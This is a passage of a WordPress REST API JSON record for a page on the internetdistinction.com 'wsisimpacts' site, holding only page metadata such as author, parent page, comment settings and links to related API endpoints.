[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1486,"menu_order":34,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-516","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/516","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=516"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/516\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1486"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=516"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}